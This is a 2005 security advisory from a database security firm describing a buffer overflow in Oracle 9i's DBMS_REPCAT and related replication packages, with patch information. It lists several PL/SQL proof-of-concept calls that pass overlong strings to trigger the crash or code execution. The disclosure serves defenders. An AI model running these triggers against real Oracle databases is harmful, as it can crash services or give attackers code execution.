Services
Information
Company |
Buffer Overflow in DBMS REPCAT in Oracle 9i
Details Buffer Overflow in DBMS_REPCAT. This package has EXECUTE permission granted to SYSDBA or EXECUTE_CATALOG_ROLE. Members of these groups can exploit this vulnerability and crash the database or execute arbitrary code. Example BEGIN DBMS_REPCAT.ADD_GROUPED_COLUMN ('longstring', 'longstring', 'cc','dd'); END; BEGIN DBMS_REPCAT.ADD_DELETE_RESOLUTION ('longstring', 'longstring', 0, '', ''); END; BEGIN DBMS_REPCAT.CANCEL_STATISTICS ('longstring', 'longstring'); END; BEGIN DBMS_REPCAT.DROP_MASTER_REPGROUP ('longstring'); END; BEGIN DBMS_REPCAT.ALTER_MVIEW_PROPAGATION ('longstring', ''); END; BEGIN DBMS_OFFLINE_OG.BEGIN_LOAD ('longstring', 'x'); END; BEGIN DBMS_OFFLINE_SNAPSHOT.END_LOAD ('longstring', 'x',’d’); END; Patch Information Apply the latest Oracle Security patches (e.g. CPU October 2004 or at least alert 68) © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |